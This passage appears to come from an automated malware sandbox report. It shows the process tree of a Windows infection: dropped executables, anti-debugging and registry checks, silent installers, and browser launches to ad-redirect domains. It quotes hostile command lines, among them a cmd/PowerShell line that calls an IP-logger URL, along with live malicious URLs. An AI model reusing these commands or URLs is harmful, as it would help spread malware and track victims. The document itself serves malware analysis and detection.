C:\Users\Admin\Documents\9YsDhPL0CFb8u51TEbNMNQPm.exe"C:\Users\Admin\Documents\9YsDhPL0CFb8u51TEbNMNQPm.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\gRPQnJhorUeOOxV8vnDmDfPK.exe"C:\Users\Admin\Documents\gRPQnJhorUeOOxV8vnDmDfPK.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qFlx4UH2YUQ4dqR4Wrkd4DnA.exe"C:\Users\Admin\Documents\qFlx4UH2YUQ4dqR4Wrkd4DnA.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\x3NgCE44wh3S1__Hyb5PvqVl.exe"C:\Users\Admin\Documents\x3NgCE44wh3S1__Hyb5PvqVl.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\u7WmSWxlHGRHf4l8vPpMvpUY.exe"C:\Users\Admin\Documents\u7WmSWxlHGRHf4l8vPpMvpUY.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\asCr7xkj3vPL813Pivuf3qJz.exe"C:\Users\Admin\Documents\asCr7xkj3vPL813Pivuf3qJz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\_eFGDGYkyZFPd0GWkch8P7Fe.exe"C:\Users\Admin\Documents\_eFGDGYkyZFPd0GWkch8P7Fe.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\W7aNRfk1wBRZpenTZJTDXqd2.exe"C:\Users\Admin\Documents\W7aNRfk1wBRZpenTZJTDXqd2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cy3BD8IMClWAp4Sb5SGnjwsu.exe"C:\Users\Admin\Documents\cy3BD8IMClWAp4Sb5SGnjwsu.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\sE6oyYqka7gpVuUPduXmrRUI.exe"C:\Users\Admin\Documents\sE6oyYqka7gpVuUPduXmrRUI.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3464864.scr"C:\Users\Admin\AppData\Roaming\3464864.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\5847552.scr"C:\Users\Admin\AppData\Roaming\5847552.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7470814.scr"C:\Users\Admin\AppData\Roaming\7470814.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20578e6239.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20578e6239.exeSat20578e6239.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2071d99516dc03841.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2071d99516dc03841.exeSat2071d99516dc03841.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20fbae42a4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20fbae42a4.exeSat20fbae42a4.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmp"C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmp" /SL5="$3012E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20fbae42a4.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FB65A.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-FB65A.tmp\ultramediaburner.tmp" /SL5="$4026E,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\e4-cfcb5-f56-97e90-cbd743f01b99c\Qoteciqigae.exe"C:\Users\Admin\AppData\Local\Temp\e4-cfcb5-f56-97e90-cbd743f01b99c\Qoteciqigae.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2820 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3704 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5920 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Users\Admin\AppData\Local\Temp\4f-21c38-c9d-b148f-9a9f478d18995\Faqitapufi.exe"C:\Users\Admin\AppData\Local\Temp\4f-21c38-c9d-b148f-9a9f478d18995\Faqitapufi.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8588 -s 24011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exeC:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632000318 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
